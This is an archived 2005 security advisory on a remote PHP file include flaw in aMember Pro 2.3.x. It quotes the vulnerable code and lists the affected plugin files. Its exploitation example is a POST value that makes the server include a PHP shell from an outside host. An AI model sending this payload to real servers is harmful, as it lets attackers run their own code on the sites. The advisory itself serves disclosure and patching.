aMember Pro 2.3.X - Remote File Include Vulnerability

2005-09-09T00:00:00
ID SECURITYVULNS:DOC:9670
Type securityvulns
Reporter Securityvulns
Modified 2005-09-09T00:00:00

Description

aMember Pro 2.3.X - Remote File Include Vulnerability

[NewAngels Advisory

2] aMember Pro

2.3.X - Remote File Include Vulnerability =============================================================================

Software: aMember Pro 2.3.4 Type: Remote PHP File Include Vulnerability Risk: High

Date: Aug. 16 2005 Vendor: CGI Central

Credit:

NewAngels Team with special note of 4Degrees.

Description:

"aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be used without any payment system - you can manage users manually." [http://www.amember.com/]

PHP Requirements:

register_globals = On

Vulnerability:

Source: >global $config; >[...] >require_once($config['root_dir']."...somestring...");

Exploitation:

This vulnerability exists in several files, the code is not exactly the same in all files. But the exploit does remain the same.

Example:http://www.somesite.com/aMember/plugins/db/mysql/mysql.inc.php POST: config[root_dir]=http://www.geocities.com/angelteamfiles/shells/banner.php?

Vulnerable Files: /aMember/plugins/db/mysql/mysql.inc.php /aMember/plugins/payment/efsnet/efsnet.inc.php /aMember/plugins/payment/theinternetcommerce/theinternetcommerce.inc.php /aMember/plugins/payment/cdg/cdg.inc.php /aMember/plugins/payment/compuworld/compuworld.inc.php /aMember/plugins/payment/directone/directone.inc.php /aMember/plugins/payment/authorize_aim/authorize_aim.inc.php /aMember/plugins/payment/beanstream/beanstream.inc.php /aMember/plugins/payment/echo/config.inc.php /aMember/plugins/payment/eprocessingnetwork/eprocessingnetwork.inc.php /aMember/plugins/payment/eway/eway.inc.php /aMember/plugins/payment/linkpoint/linkpoint.inc.php /aMember/plugins/payment/logiccommerce/logiccommerce.inc.php /aMember/plugins/payment/netbilling/netbilling.inc.php /aMember/plugins/payment/payflow_pro/payflow_pro.inc.php /aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php /aMember/plugins/payment/payos/payos.inc.php /aMember/plugins/payment/payready/payready.inc.php /aMember/plugins/payment/plugnplay/plugnplay.inc.php

orginal advisory: http://pridels.blogspot.com/2005/09/amember-pro-23x-remote-file-include.html


http://Mobile.NextMail.ru - мобильные развлечения: мелодии, логотипы, Java-игры